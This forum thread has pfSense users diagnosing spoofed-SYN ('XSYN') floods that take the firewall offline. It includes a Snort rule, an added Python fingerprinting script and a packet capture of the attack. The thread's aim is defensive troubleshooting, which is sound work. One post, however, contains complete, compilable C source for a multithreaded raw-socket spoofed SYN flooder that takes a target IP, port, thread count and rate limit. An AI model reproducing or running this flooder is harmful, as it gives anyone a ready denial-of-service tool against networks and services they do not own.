DDoS pfSense dies on XSYN and OVH scripts.


  • It goes offline instantly despite no resource hog and plenty of CPU to spare.

    Tested on 100 Mbit, 1 Gbit and 10 Gbit pipes.

    It lasts the longest on the 100 Mbit pipe.

    It survives and keeps being responsive on SSDP, ESSYN, UQUAKE and most Layer 7 attacks.

    Any guesses to why??



  • If there is anyone here who can help, I would like to pay a good amount of money $$$$ - Just tell me how to prevent these attacks without limiting pfSense in such a way that there is no point in using it.
    Tired of getting DDoSed by script kiddies who are misusing the design of pfSense to. It is not a traditional attack where the bandwidth is 500 Mbit etc.

    We are talking about a 10 Mbit special spoofed attack on 1 Gbit and 10 Gbit drops... Goes instantly offline. It is all SYN but just in a special way. I may have the source and a packet capture file for the one who really knows this field.

    • If not using any firewall, there are no issues. You can even prevent it by using iptables or Windows Firewall... Running stateless is a bit better, but this opens other issues as well.

    A regular SSYN flood is no problem for pfSense thanks to the SYN cookie feature. But they somehow found another way around, so they are bypassing the ordinary check with this new type of SYN flood... They name it XSYN, ESSYN, OVH method etc.



  • Can you share some of those packets?

    F.


  • With XSYN it only takes 5 Mbit of traffic to make pfSense very unstable.

    Any booter or stresser can take whatever site with pfsense offline instantly.

    We hope to have some sort of reply from the Dev. team regarding this and it would be great to have a test site going so we can stress it and they can see how little it takes to bring it down.


  • When the video has been processed by YouTube, you can watch what happens when pfSense gets DDoS'ed.

    http://youtu.be/mUxUYPHGrlM

    Watch it in 720p.

    The attack takes 120 seconds and takes it offline instantly. Doesn't route anything meanwhile.



  • Just making sure, this attack is a "Spoofed SYN" attack, right? I get very few hits for XSYN or ESSYN, and the few hits I found said they're also known as SSYN. But then it was posted that pfSense handles ESSYN just fine, but not XSYN. Now I'm confused. Is there a place that defines exactly what these attacks are, because Google is returning nothing useful.


  • It's new scripts emerging with new ways to take down sites.

    That's the only explanation I have. I could run a packet capture but in seconds it is a 500 MB file...


  • This is the XSYN script

    /* "SSYN Flooder by LSDEV, improved by Starfall" as posted in the thread, with
     * the forum's markup damage repaired (array indexes, operators, include paths
     * and the usage string). Raw-socket spoofed SYN flooder: every packet is a
     * 20-byte IP header plus a 20-byte TCP header with no options (40 bytes on
     * the wire) from a random source address and source port. Written for 32-bit
     * Linux: on a 64-bit host "unsigned long" is 64 bits, which changes the size
     * of the pseudo header in tcpcsum() and the behaviour of the CMWC generator. */
    #include <pthread.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netinet/ip.h>
    #include <netinet/tcp.h>
    #include <arpa/inet.h>
    #include <time.h>
    #define MAX_PACKET_SIZE 4096
    #define PHI 0x9e3779b9

    static unsigned long int Q[4096], c = 362436;
    static unsigned int floodport;
    volatile int limiter;
    volatile unsigned int pps;
    volatile unsigned int sleeptime = 100;

    /* Marsaglia complementary-multiply-with-carry generator, seeded from time(). */
    void init_rand(unsigned long int x)
    {
        int i;
        Q[0] = x;
        Q[1] = x + PHI;
        Q[2] = x + PHI + PHI;
        for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
    }
    unsigned long int rand_cmwc(void)
    {
        unsigned long long int t, a = 18782LL;
        static unsigned long int i = 4095;
        unsigned long int x, r = 0xfffffffe;
        i = (i + 1) & 4095;
        t = a * Q[i] + c;
        c = (t >> 32);
        x = t + c;
        if (x < c) {
            x++;
            c++;
        }
        return (Q[i] = r - x);
    }

    /* Ones-complement Internet checksum over count bytes. */
    unsigned short csum (unsigned short *buf, int count)
    {
        register unsigned long sum = 0;
        while( count > 1 ) { sum += *buf++; count -= 2; }
        if(count > 0) { sum += *(unsigned char *)buf; }
        while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
        return (unsigned short)(~sum);
    }

    /* TCP checksum over the pseudo header plus the option-less TCP header. */
    unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {

        struct tcp_pseudo
        {
            unsigned long src_addr;
            unsigned long dst_addr;
            unsigned char zero;
            unsigned char proto;
            unsigned short length;
        } pseudohead;
        unsigned short total_len = iph->tot_len;
        pseudohead.src_addr=iph->saddr;
        pseudohead.dst_addr=iph->daddr;
        pseudohead.zero=0;
        pseudohead.proto=IPPROTO_TCP;
        pseudohead.length=htons(sizeof(struct tcphdr));
        int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
        unsigned short *tcp = malloc(totaltcp_len);
        memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
        memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
        unsigned short output = csum(tcp,totaltcp_len);
        free(tcp);
        return output;
    }

    /* IP header with a random (spoofed) source address and TTL = MAXTTL (255). */
    void setup_ip_header(struct iphdr *iph)
    {
        char ip[17];
        snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
        iph->ihl = 5;
        iph->version = 4;
        iph->tos = 0;
        iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
        iph->id = htonl(rand()%54321);
        iph->frag_off = 0;
        iph->ttl = MAXTTL;
        iph->protocol = 6;
        iph->check = 0;
        iph->saddr = inet_addr(ip);
    }

    void setup_tcp_header(struct tcphdr *tcph)
    {
        tcph->source = htons(rand()%65535);
        tcph->seq = rand();
        tcph->ack_seq = 0;
        tcph->res2 = 0;
        tcph->doff = 5;                 /* 20-byte header, no options */
        tcph->syn = 1;                  /* SYN only */
        /* htonl() of a 16-bit value stored into the 16-bit window field is
         * truncated to 0 on little-endian hosts: hence "win 0" in captures. */
        tcph->window = htonl(65535);
        tcph->check = 0;
        tcph->urg_ptr = 0;
    }

    /* One sender thread: build a SYN, send it, re-randomise, repeat. */
    void *flood(void *par1)
    {
        char *td = (char *)par1;
        char datagram[MAX_PACKET_SIZE];
        struct iphdr *iph = (struct iphdr *)datagram;
        struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);

        struct sockaddr_in sin;
        sin.sin_family = AF_INET;
        sin.sin_port = htons(floodport);
        sin.sin_addr.s_addr = inet_addr(td);

        int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
        if(s < 0){
            fprintf(stderr, "Could not open raw socket.\n");
            exit(-1);
        }
        memset(datagram, 0, MAX_PACKET_SIZE);
        setup_ip_header(iph);
        setup_tcp_header(tcph);

        tcph->dest = htons(floodport);

        iph->daddr = sin.sin_addr.s_addr;
        iph->check = csum ((unsigned short *) datagram, iph->tot_len);

        int tmp = 1;
        const int *val = &tmp;
        if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
            fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
            exit(-1);
        }

        init_rand(time(NULL));
        register unsigned int i;
        i = 0;
        while(1){
            /* Only tot_len (40) bytes are sent; the 4096-byte buffer is never filled. */
            sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
            setup_ip_header(iph);
            setup_tcp_header(tcph);
            iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
            iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);

            tcph->dest = htons(floodport);

            iph->daddr = sin.sin_addr.s_addr;

            iph->check = csum ((unsigned short *) datagram, iph->tot_len);
            /* A 16-bit value written in host order into the 32-bit seq field:
             * on the wire the low 16 bits of the sequence number are always 0. */
            tcph->seq = rand_cmwc() & 0xFFFF;
            tcph->source = htons(rand_cmwc() & 0xFFFF);
            tcph->check = 0;
            tcph->check = tcpcsum(iph, tcph);

            pps++;
            if(i >= limiter)
            {
                i = 0;
                usleep(sleeptime);
            }
            i++;
        }
    }

    int main(int argc, char *argv[ ])
    {
        if(argc < 6){
            fprintf(stderr, "Invalid parameters!\n");
            fprintf(stdout, "SSYN Flooder by LSDEV\nImproved by Starfall\nUsage: %s <target IP> <port to be flooded> <number of threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
            exit(-1);
        }
        srand(time(0));
        fprintf(stdout, "Tank: So what do you need? Besides a miracle.\nNeo: Packets. Lots of packets.\n");

        int num_threads = atoi(argv[3]);
        floodport = atoi(argv[2]);
        int maxpps = atoi(argv[4]);
        limiter = 0;
        pps = 0;
        pthread_t thread[num_threads];

        int multiplier = 20;

        int i;
        for(i = 0;i<num_threads;i++){
            pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
        }
        /* Rate control: sample pps 20 times a second and adjust the per-thread
         * limiter/sleep so the aggregate stays near maxpps for <time> seconds. */
        for(i = 0;i<(atoi(argv[5])*multiplier);i++)
        {
            usleep((1000/multiplier)*1000);
            if((pps*multiplier) > maxpps)
            {
                if(1 > limiter)
                {
                    sleeptime+=100;
                } else {
                    limiter--;
                }
            } else {
                limiter++;
                if(sleeptime > 25)
                {
                    sleeptime-=25;
                } else {
                    sleeptime = 0;
                }
            }
            pps = 0;
        }

        return 0;
    }



  • @Supermule:

    It's new scripts emerging with new ways to take down sites.

    That's the only explanation I have. I could run a packet capture but in seconds it is a 500 MB file...

    Just set the capture to 100 packets. Based on the number coming in, that should be all that is needed for a sample.



  • edit: scratch this, "tot_len" looks to be passed around. datagram may be MAX_PACKET_SIZE, but tot_len is used.

    Just glancing through the code, it looks as if it's sending SYN packets with data in them.

     memset(datagram, 0, MAX_PACKET_SIZE);
            setup_ip_header(iph);
            setup_tcp_header(tcph);
    
            tcph->dest = htons(floodport);
    
            iph->daddr = sin.sin_addr.s_addr;
            iph->check = csum ((unsigned short *) datagram, iph->tot_len);
    

    ~~What's also interesting is that MAX_PACKET_SIZE is defined as 4096, which would mean it would need to get fragmented.

    So assuming that I'm reading the code correctly, we're talking about 4KB SYN packets that are fragmented. I don't know if cookies are useful against SYN packets with data, let alone fragmented.~~

    Again, we'll have to see some example dumps.



  • Wouldn't that rule cover it?

    alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"DELETED BAD-TRAFFIC data in TCP SYN packet"; flow:stateless; dsize:>6; flags:S,12; reference:url,www.cert.org/incident_notes/IN-99-07.html; classtype:misc-activity; sid:526; rev:14;)

    Still... w/o a pcap it's all mumbo jumbo...

    http://manual.snort.org/node33.html

    When we see it, its possible to play with flow, seq, ttl, size...etc...

    F.
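Two details tie the script posted above to the capture posted further down the thread. The script stores htonl(65535) in the 16-bit TCP window field, which on a little-endian host truncates to 0, and it writes a 16-bit value in host order into the 32-bit sequence field, so the low 16 bits of every sequence number on the wire are 0. Each flood packet is 40 bytes of IP plus TCP header with no options and no payload, so the Snort rule quoted above (sid:526, dsize:>6) can never match it. The following is an added example written for this page, not code from the thread, from pfSense or from Snort: it parses the two-line tcpdump -e -nn -v text format the capture uses, fingerprints the flood on those properties, and evaluates the rule's dsize/flags condition against each packet. The sample packets are constructed from the thread's capture (with the "[S]" flag text the forum stripped restored), and the function and variable names are my own.

```python
"""Fingerprint the spoofed-SYN flood from tcpdump text output and check the
quoted Snort rule (sid:526: flags:S, dsize:>6) against each packet."""
import re
import struct

# Constructed sample, copied in shape from the thread's capture: three flood
# SYNs and one SYN-ACK reply. tcpdump -e -nn -v prints two lines per packet.
SAMPLE = """\
10:30:39.512882 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 15609, offset 0, flags [none], proto TCP (6), length 40)
    124.126.1.96.12168 > 80.197.144.99.80: Flags [S], cksum 0x1957 (correct), seq 128778240, win 0, length 0
10:30:39.512889 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 55269, offset 0, flags [none], proto TCP (6), length 40)
    146.165.177.209.56401 > 80.197.144.99.80: Flags [S], cksum 0xcd22 (correct), seq 3766353920, win 0, length 0
10:30:39.512894 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 5448, offset 0, flags [none], proto TCP (6), length 40)
    142.229.57.191.34479 > 80.197.144.99.80: Flags [S], cksum 0xc66e (correct), seq 3097952256, win 0, length 0
10:30:39.512923 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 255, offset 0, flags [DF], proto TCP (6), length 44)
    80.197.144.99.80 > 66.247.29.183.56944: Flags [S.], cksum 0x6ac1 (correct), seq 974824198, ack 261881857, win 8192, options [mss 1460], length 0
"""

# First line of a packet: IP header summary. Second line: TCP summary.
HDR = re.compile(r"ttl (\d+), id (\d+), .*?proto TCP \(6\), length (\d+)\)")
TCP = re.compile(r"(\S+)\.(\d+) > (\S+)\.(\d+): Flags \[([^\]]*)\], .*?seq (\d+),"
                 r"(?: ack (\d+),)? win (\d+),(?: options \[([^\]]*)\],)? length (\d+)")


def parse_capture(text):
    """Turn tcpdump -v text (two lines per packet) into a list of dicts."""
    lines = [l for l in text.splitlines() if l.strip()]
    pkts = []
    for hdr, body in zip(lines[0::2], lines[1::2]):
        h, t = HDR.search(hdr), TCP.search(body)
        if not (h and t):
            continue  # not a TCP packet, or a truncated pair
        pkts.append({
            "ttl": int(h.group(1)), "ip_id": int(h.group(2)), "ip_len": int(h.group(3)),
            "src": t.group(1), "sport": int(t.group(2)),
            "dst": t.group(3), "dport": int(t.group(4)),
            "flags": t.group(5), "seq": int(t.group(6)),
            "ack": int(t.group(7)) if t.group(7) else None,
            "win": int(t.group(8)), "options": t.group(9),
            "payload": int(t.group(10)),
        })
    return pkts


def script_window_on_wire():
    """tcph->window = htonl(65535) assigned to a 16-bit field on a little-endian
    host: the 32-bit value 0xffff0000 keeps only its low 16 bits, i.e. 0."""
    as_host_u32 = struct.unpack("<I", struct.pack(">I", 65535))[0]  # htonl()
    return as_host_u32 & 0xFFFF


def script_seq_on_wire(host_seq16):
    """tcph->seq = rand_cmwc() & 0xFFFF is stored without htonl(): the two
    meaningful bytes land in the high half when read in network order."""
    return struct.unpack(">I", struct.pack("<I", host_seq16 & 0xFFFF))[0]


def is_xsyn_syn(p):
    """Fingerprint of one flood packet: bare SYN, 40-byte IP+TCP, no options,
    no payload, window 0, sequence number with zero low 16 bits."""
    return (p["flags"] == "S" and p["ip_len"] == 40 and p["options"] is None
            and p["payload"] == 0 and p["win"] == 0 and p["seq"] % 65536 == 0)


def snort_sid526_matches(p):
    """Condition of the quoted rule: SYN set (flags:S,12) and more than 6
    bytes of payload (dsize:>6). flow:stateless means no session is needed."""
    return p["flags"] == "S" and p["payload"] > 6


def summarize(pkts):
    flood = [p for p in pkts if is_xsyn_syn(p)]
    return {
        "packets": len(pkts),
        "flood_syns": len(flood),
        "distinct_sources": len({p["src"] for p in flood}),
        "ttls": sorted({p["ttl"] for p in flood}),
        "syn_acks": sum(1 for p in pkts if p["flags"] == "S."),
        "sid526_hits": sum(1 for p in pkts if snort_sid526_matches(p)),
    }


if __name__ == "__main__":
    print(summarize(parse_capture(SAMPLE)))
```

On a real capture, feed the output of `tcpdump -nn -e -v -r file.pcap` to parse_capture(). The script sets TTL to MAXTTL (255), so the near-constant 243/244 on arrival is consistent with a single origin 11 or 12 hops away even though every source address differs. pf rules cannot match on the TCP window or sequence number, so this fingerprint is a triage aid for confirming which tool is in use, not a filter.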


  • 100-packet capture, full log view.

    10:30:39.512882 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 15609, offset 0, flags [none], proto TCP (6), length 40)
        124.126.1.96.12168 > 80.197.144.99.80: Flags [S], cksum 0x1957 (correct), seq 128778240, win 0, length 0
    10:30:39.512889 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 55269, offset 0, flags [none], proto TCP (6), length 40)
        146.165.177.209.56401 > 80.197.144.99.80: Flags [S], cksum 0xcd22 (correct), seq 3766353920, win 0, length 0
    10:30:39.512894 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 5448, offset 0, flags [none], proto TCP (6), length 40)
        142.229.57.191.34479 > 80.197.144.99.80: Flags [S], cksum 0xc66e (correct), seq 3097952256, win 0, length 0
    10:30:39.512900 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 8226, offset 0, flags [none], proto TCP (6), length 40)
        98.180.161.223.44311 > 80.197.144.99.80: Flags [S], cksum 0x7344 (correct), seq 2843344896, win 0, length 0
    10:30:39.512905 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 25435, offset 0, flags [none], proto TCP (6), length 40)
        181.82.109.47.28448 > 80.197.144.99.80: Flags [S], cksum 0x81eb (correct), seq 3134980096, win 0, length 0
    10:30:39.512916 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 62920, offset 0, flags [none], proto TCP (6), length 40)
        121.220.208.214.22518 > 80.197.144.99.80: Flags [S], cksum 0xd178 (correct), seq 1514668032, win 0, length 0
    10:30:39.512923 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 255, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 66.247.29.183.56944: Flags [S.], cksum 0x6ac1 (correct), seq 974824198, ack 261881857, win 8192, options [mss 1460], length 0
    10:30:39.512929 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 59540, offset 0, flags [none], proto TCP (6), length 40)
        119.25.145.201.64822 > 80.197.144.99.80: Flags [S], cksum 0x766d (correct), seq 1373831168, win 0, length 0
    10:30:39.512979 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 256, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 63.118.133.110.20856: Flags [S.], cksum 0x7898 (correct), seq 850731965, ack 2973040641, win 8192, options [mss 1460], length 0
    10:30:39.513032 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 257, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 194.251.26.247.64387: Flags [S.], cksum 0xa9d7 (correct), seq 780280974, ack 3225288705, win 8192, options [mss 1460], length 0
    10:30:39.513069 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 258, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 24.254.59.7.40452: Flags [S.], cksum 0x341d (correct), seq 2301007402, ack 1361379329, win 8192, options [mss 1460], length 0
    10:30:39.513105 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 58084, offset 0, flags [none], proto TCP (6), length 40)
        132.56.232.167.26069 > 80.197.144.99.80: Flags [S], cksum 0x8170 (correct), seq 2051276800, win 0, length 0
    10:30:39.513111 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 25107, offset 0, flags [none], proto TCP (6), length 40)
        217.240.47.106.37841 > 80.197.144.99.80: Flags [S], cksum 0xe3a3 (correct), seq 1301938176, win 0, length 0
    10:30:39.513116 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 32613, offset 0, flags [none], proto TCP (6), length 40)
        203.27.178.8.42841 > 80.197.144.99.80: Flags [S], cksum 0x25e2 (correct), seq 2215247872, win 0, length 0
    10:30:39.513129 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 259, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 90.32.123.216.56239: Flags [S.], cksum 0xf380 (correct), seq 3316227498, ack 2384396289, win 8192, options [mss 1460], length 0
    10:30:39.513138 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 40324, offset 0, flags [none], proto TCP (6), length 40)
        138.148.30.251.1975 > 80.197.144.99.80: Flags [S], cksum 0x8f77 (correct), seq 2376859648, win 0, length 0
    10:30:39.513143 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 38512, offset 0, flags [none], proto TCP (6), length 40)
        126.105.143.214.53029 > 80.197.144.99.80: Flags [S], cksum 0x7de9 (correct), seq 1931149312, win 0, length 0
    10:30:39.513148 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 21053, offset 0, flags [none], proto TCP (6), length 40)
        125.41.180.149.55609 > 80.197.144.99.80: Flags [S], cksum 0x6edc (correct), seq 1419051008, win 0, length 0
    10:30:39.513153 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 12435, offset 0, flags [none], proto TCP (6), length 40)
        134.129.53.201.56635 > 80.197.144.99.80: Flags [S], cksum 0x2d4e (correct), seq 127270912, win 0, length 0
    10:30:39.513157 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 13121, offset 0, flags [none], proto TCP (6), length 40)
        135.55.17.72.64101 > 80.197.144.99.80: Flags [S], cksum 0x481a (correct), seq 4083810304, win 0, length 0
    10:30:39.513171 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 42913, offset 0, flags [none], proto TCP (6), length 40)
        146.221.69.178.15824 > 80.197.144.99.80: Flags [S], cksum 0x8c3e (correct), seq 734789632, win 0, length 0
    10:30:39.513176 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 37333, offset 0, flags [none], proto TCP (6), length 40)
        140.154.19.76.28946 > 80.197.144.99.80: Flags [S], cksum 0xd946 (correct), seq 3827957760, win 0, length 0
    10:30:39.513181 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 24788, offset 0, flags [none], proto TCP (6), length 40)
        183.130.66.135.25433 > 80.197.144.99.80: Flags [S], cksum 0xfc53 (correct), seq 1957888000, win 0, length 0
    10:30:39.513185 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 41109, offset 0, flags [none], proto TCP (6), length 40)
        96.250.94.246.26385 > 80.197.144.99.80: Flags [S], cksum 0x4012 (correct), seq 1733689344, win 0, length 0
    10:30:39.513193 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 36016, offset 0, flags [none], proto TCP (6), length 40)
        42.233.83.95.32369 > 80.197.144.99.80: Flags [S], cksum 0x7181 (correct), seq 1613692928, win 0, length 0
    10:30:39.513198 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 260, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 174.62.195.127.17079: Flags [S.], cksum 0x5c79 (correct), seq 3567492465, ack 328794113, win 8192, options [mss 1460], length 0
    10:30:39.513204 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 23555, offset 0, flags [none], proto TCP (6), length 40)
        133.237.77.73.15765 > 80.197.144.99.80: Flags [S], cksum 0x3c91 (correct), seq 2165112832, win 0, length 0
    10:30:39.513210 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 20533, offset 0, flags [none], proto TCP (6), length 40)
        194.82.219.188.26186 > 80.197.144.99.80: Flags [S], cksum 0x1c61 (correct), seq 2913927168, win 0, length 0
    10:30:39.513215 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 29941, offset 0, flags [none], proto TCP (6), length 40)
        2.175.116.175.56648 > 80.197.144.99.80: Flags [S], cksum 0xabbc (correct), seq 3456499712, win 0, length 0
    10:30:39.513219 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 11326, offset 0, flags [none], proto TCP (6), length 40)
        77.224.169.12.27795 > 80.197.144.99.80: Flags [S], cksum 0x47d4 (correct), seq 588644352, win 0, length 0
    10:30:39.513229 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 21511, offset 0, flags [none], proto TCP (6), length 40)
        59.27.175.229.27925 > 80.197.144.99.80: Flags [S], cksum 0x7142 (correct), seq 85065728, win 0, length 0
    10:30:39.513234 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 35835, offset 0, flags [none], proto TCP (6), length 40)
        177.25.59.242.24222 > 80.197.144.99.80: Flags [S], cksum 0x5223 (correct), seq 815595520, win 0, length 0
    10:30:39.513238 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 31334, offset 0, flags [none], proto TCP (6), length 40)
        169.234.140.63.18063 > 80.197.144.99.80: Flags [S], cksum 0x10e5 (correct), seq 1087111168, win 0, length 0
    10:30:39.513243 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 44152, offset 0, flags [none], proto TCP (6), length 40)
        8.84.151.119.14632 > 80.197.144.99.80: Flags [S], cksum 0x93e6 (correct), seq 1636827136, win 0, length 0
    10:30:39.513248 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 7412, offset 0, flags [none], proto TCP (6), length 40)
        221.82.85.146.9125 > 80.197.144.99.80: Flags [S], cksum 0xbb9d (correct), seq 3158441984, win 0, length 0
    10:30:39.513255 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 21173, offset 0, flags [none], proto TCP (6), length 40)
        46.183.138.45.4730 > 80.197.144.99.80: Flags [S], cksum 0x9113 (correct), seq 1912078336, win 0, length 0
    10:30:39.513259 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 25625, offset 0, flags [none], proto TCP (6), length 40)
        181.120.7.61.44990 > 80.197.144.99.80: Flags [S], cksum 0xb9d9 (correct), seq 2820407296, win 0, length 0
    10:30:39.513264 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 37713, offset 0, flags [none], proto TCP (6), length 40)
        125.185.112.15.5395 > 80.197.144.99.80: Flags [S], cksum 0xab36 (correct), seq 542638080, win 0, length 0
    10:30:39.513269 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 34266, offset 0, flags [none], proto TCP (6), length 40)
        44.27.106.98.25930 > 80.197.144.99.80: Flags [S], cksum 0xb80e (correct), seq 445906944, win 0, length 0
    10:30:39.513274 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 3720, offset 0, flags [none], proto TCP (6), length 40)
        55.5.128.17.25981 > 80.197.144.99.80: Flags [S], cksum 0xad36 (correct), seq 77594624, win 0, length 0
    10:30:39.513281 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 57514, offset 0, flags [none], proto TCP (6), length 40)
        135.124.240.221.8915 > 80.197.144.99.80: Flags [S], cksum 0xb024 (correct), seq 2199388160, win 0, length 0
    10:30:39.513285 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 3550, offset 0, flags [none], proto TCP (6), length 40)
        91.191.90.204.49263 > 80.197.144.99.80: Flags [S], cksum 0x8286 (correct), seq 3571974144, win 0, length 0
    10:30:39.513290 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 30244, offset 0, flags [none], proto TCP (6), length 40)
        37.132.112.137.61653 > 80.197.144.99.80: Flags [S], cksum 0x12fe (correct), seq 881393664, win 0, length 0
